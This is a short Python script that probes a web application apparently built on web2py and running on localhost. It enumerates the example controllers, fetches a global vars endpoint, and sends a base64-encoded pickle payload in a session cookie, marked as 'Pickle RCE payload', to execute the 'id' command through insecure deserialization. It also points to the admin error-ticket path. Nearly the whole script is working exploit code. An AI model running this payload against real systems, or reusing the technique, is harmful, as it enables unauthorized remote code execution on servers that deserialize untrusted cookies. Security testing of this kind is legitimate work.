#!/usr/bin/env python3
import base64
import pickle
import requests
import urllib3
urllib3.disable_warnings()

BASE = "https://localhost:5000"
s = requests.Session()

# Test 1: Check if examples app has custom controllers
print("[*] Enumerating examples app controllers...")
for controller in ["default", "ajax_examples", "database_examples", "global"]:
    r = s.get(f"{BASE}/examples/{controller}/index", verify=False)
    print(f"  /{controller}: {r.status_code}")

# Test 2: Check for global/vars endpoint (common in examples)
print("\n[*] Testing /examples/global/vars...")
r = s.get(f"{BASE}/examples/global/vars", verify=False)
print(f"  Status: {r.status_code}")
if r.status_code == 200:
    print(f"  Content preview: {r.text[:500]}")

# Test 3: Try pickle-based session deserialization
print("\n[*] Testing session cookie deserialization...")
payload = b"cos\nsystem\n(S'id'\ntR."  # Pickle RCE payload
encoded = base64.b64encode(payload).decode()
r = s.get(f"{BASE}/examples/default/index",
          cookies={"session_id_examples": encoded},
          verify=False)
print(f"  Status: {r.status_code}")

# Test 4: Check the actual error ticket
print("\n[*] Try accessing error ticket via admin (if accessible):")
print(f"  {BASE}/admin/default/ticket/examples/[ticket-id]")